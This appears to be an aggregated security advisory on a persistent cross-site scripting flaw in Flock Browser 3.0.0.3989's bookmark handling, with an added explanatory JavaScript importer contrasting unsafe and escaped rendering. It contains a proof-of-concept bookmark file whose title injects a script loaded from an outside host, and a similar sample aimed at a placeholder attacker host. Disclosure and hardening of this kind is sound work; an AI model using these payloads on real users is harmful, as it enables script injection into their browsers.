Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

21 Aug 2010 00:00:00 | Reported by Lostmon | Type: packetstorm | Source: packetstormsecurity.com

Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting: a persistent script insertion vulnerability in the browser's bookmark handling.

#########################################
Flock Browser 3.0.0.3989 Malformed Bookmark XSS
Vendor URL: http://beta.flock.com/
Advisory: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html
Vendor notified: NO    Exploits available: YES
#########################################

Flock is faster, simpler, and more friendly. Literally.
It's the only sleek, modern web browser with the built-in
ability to keep you up-to-date with your Facebook and Twitter
friends. This browser version (3.0.0.3989) is based on an old
Chromium project.

Flock has a flaw that allows cross-site scripting style attacks.
A malformed bookmark title is stored and later rendered without
escaping, giving a persistent XSS in the bookmarks. It is triggered
when a malformed bookmark is imported from another browser, when a
new malformed bookmark is added, or when a bookmark HTML file is
imported.

###############################
Example of bookmark HTML file
###############################

```html
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<!-- This is an automatically generated file.
It will be read and overwritten.
DO NOT EDIT! -->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Menú Marcadores</H1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605"
LAST_MODIFIED="1282083638">"><script
src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>
</DL><p>
```

#####################EOF##################

It is a persistent script insertion: when the user opens the
favorites page from the menu, or accesses the favorites URL directly,
the injected script "defaces" that page and the user can no longer
access their favorites :)
( URL of favorites =>
chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )

################# End #######################

Sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
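The rendering flaw the advisory describes, as an added example that is not code from the advisory or from Flock: a small importer for the Netscape bookmark file format that keeps each title as text and escapes it on output, shown beside the unsafe concatenation that lets a malformed title run as script. The parser, the constructed sample file and the placeholder host attacker.example are assumptions made here.

```javascript
// Added example, not code from the advisory or from Flock: a bookmark-file
// importer for the NETSCAPE-Bookmark-file-1 format that treats titles as text.
const ENTRY_RE = /<DT>\s*<A\s+([^>]*)>([\s\S]*?)<\/A>/gi; // one <DT><A ...>title</A>
const ATTR_RE = /([A-Z_]+)="([^"]*)"/gi;                 // NAME="value" pairs

// Decode the entities a bookmark exporter writes into values and titles.
function decodeEntities(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39);/g, (_, n) => map[n]);
}

// Escape for insertion into HTML text or a double-quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Parse the file into { href, title } records. The title is whatever sits
// between the <A ...> start tag and </A>, markup included, kept as text.
function parseBookmarks(html) {
  const entries = [];
  for (const m of html.matchAll(ENTRY_RE)) {
    const attrs = {};
    for (const a of m[1].matchAll(ATTR_RE)) attrs[a[1].toUpperCase()] = decodeEntities(a[2]);
    entries.push({ href: attrs.HREF || '', title: decodeEntities(m[2]) });
  }
  return entries;
}

// The pattern behind the advisory: the title is concatenated straight into
// markup, so a title of the form "><script ...> becomes a live script tag.
function renderUnsafe(entries) {
  return '<ul>' + entries.map((e) => `<li><a href="${e.href}">${e.title}</a></li>`).join('') + '</ul>';
}

// Hardened form: escape href and title, and only link to http(s) targets.
function renderSafe(entries) {
  const items = entries
    .filter((e) => /^https?:\/\//i.test(e.href))
    .map((e) => `<li><a href="${escapeHtml(e.href)}">${escapeHtml(e.title)}</a></li>`);
  return '<ul>' + items.join('') + '</ul>';
}

// Constructed sample: one malformed title shaped like the advisory's, one
// ordinary entry with entity-encoded text (attacker.example is a placeholder).
const SAMPLE = `<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL><p>
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605"
LAST_MODIFIED="1282083638">"><script src='http://attacker.example/x.js'></A>
<DT><A HREF="http://example.com/?a=1&amp;b=2" ADD_DATE="1282083700">Tom &amp; Jerry</A>
</DL><p>`;
```

Running `renderSafe(parseBookmarks(SAMPLE))` yields a list whose first entry shows the literal text `"><script ...>` instead of loading a script, which is the behaviour the importer in the advisory lacks.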

Vulners AI Score: 7.4 (High risk)